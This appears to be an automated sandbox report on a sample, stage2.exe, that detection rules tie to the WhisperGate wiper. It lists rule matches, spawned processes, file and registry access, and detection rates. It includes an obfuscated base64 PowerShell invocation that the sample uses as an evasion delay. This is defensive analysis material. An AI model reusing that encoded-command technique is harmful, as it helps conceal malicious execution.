    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPE Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPE Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPE Matched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp, type: MEMORY Matched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: Process Memory Space: powershell.exe PID: 7160, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
    Source: Process Memory Space: powershell.exe PID: 7140, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
    Source: C:\Users\user\Desktop\stage2.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04A6CB10
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E75768
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E76728
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E78320
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E78310
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E79058
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E71B88
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E79820
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07EA7E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E71B78
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A3DFA8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A3F278
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A30040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A3EF20
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A67E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_080D8C28
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_080D8C18
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_080DA6B8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_080DA6B2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A3A16F
    Source: stage2.exe, 00000001.00000000.439903603.0000000000EA8000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
    Source: stage2.exe, 00000001.00000002.480852082.000000000161A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs stage2.exe
    Source: stage2.exe, 00000001.00000000.438479767.000000000161A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs stage2.exe
    Source: stage2.exe Binary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
    Source: stage2.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: stage2.exe Static PE information: invalid certificate
    Source: stage2.exe Virustotal: Detection: 44%
    Source: stage2.exe ReversingLabs: Detection: 48%
    Source: C:\Users\user\Desktop\stage2.exe File read: C:\Users\user\Desktop\stage2.exe
    Source: stage2.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\stage2.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown Process created: C:\Users\user\Desktop\stage2.exe "C:\Users\user\Desktop\stage2.exe"
    Source: C:\Users\user\Desktop\stage2.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\stage2.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\stage2.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
    Source: C:\Users\user\Desktop\stage2.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Users\user\Desktop\stage2.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Users\user\Desktop\stage2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220117
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0qgkhds.0yb.ps1
    Source: classification engine Classification label: mal72.troj.evad.winEXE@8/14@1/2
    Source: C:\Users\user\Desktop\stage2.exe File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Users\user\Desktop\stage2.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7084
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
    Source: C:\Users\user\Desktop\stage2.exe File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\Desktop\stage2.exe File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
    Source: Window Recorder Window detected: More than 3 window changes detected